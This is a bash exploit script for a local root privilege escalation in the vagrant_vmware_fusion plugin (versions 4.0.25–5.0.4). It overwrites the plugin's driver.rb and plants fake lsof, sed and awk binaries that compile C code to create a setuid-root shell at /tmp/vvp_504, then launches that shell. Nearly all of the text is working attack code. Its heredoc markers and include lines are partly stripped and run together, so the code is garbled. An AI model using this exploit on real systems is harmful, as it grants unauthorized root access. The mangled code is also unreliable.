#!/bin/bash echo echo "################################################################" echo "# vagrant_vmware_fusion plugin 4.0.25-5.0.4 local root privesc #" echo "# by m4rkw - https://m4.rkw.io/blog.html #" echo "################################################################" echo cleanup() { rm -rf ~/.vagrant_vmware_fusion_504_exp mv -f ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb.orig ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb } gem_version="2.4.2" plugin_version=`ls ~/.vagrant.d/gems/*/gems/ |grep vagrant-vmware-fusion |cut -d '-' -f4 |tail -n1` cat > /tmp/vvp_504.c < int main() { setuid(0); seteuid(0); execl("/bin/bash","bash","-c","rm -f /tmp/vvp_504; /bin/bash",NULL); return 0; } EOF gcc -o /tmp/vvp_504 /tmp/vvp_504.c rm -f /tmp/vvp_504.c cd mkdir .vagrant_vmware_fusion_504_exp cd .vagrant_vmware_fusion_504_exp if [ ! -e ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb.orig ] ; then mv ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb.orig fi cat > ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb < /tmp/vvp_504.c < #include int main(int ac, char *av[]) { if (geteuid() == 0) { setuid(0); setgid(0); system("chown root:wheel /tmp/vvp_504"); system("chmod 4755 /tmp/vvp_504"); } execv("/usr/bin/$1",av); return 0; } EOF gcc -o $1 /tmp/vvp_504.c rm -f /tmp/vvp_504.c `ruby ~/.vagrant.d/gems/$gem_version/gems/vagrant-vmware-fusion-$plugin_version/lib/vagrant-vmware-fusion/driver.rb 2>/dev/null` r=`ls -la /tmp/vvp_504 |grep '\-rws' |grep root` if [ "$r" != "" ] ; then cleanup cd /tmp/vvp_504 exit 0 else rm -f $1 fi } attempt "lsof" attempt "sed" attempt "awk" cleanup echo "not vulnerable"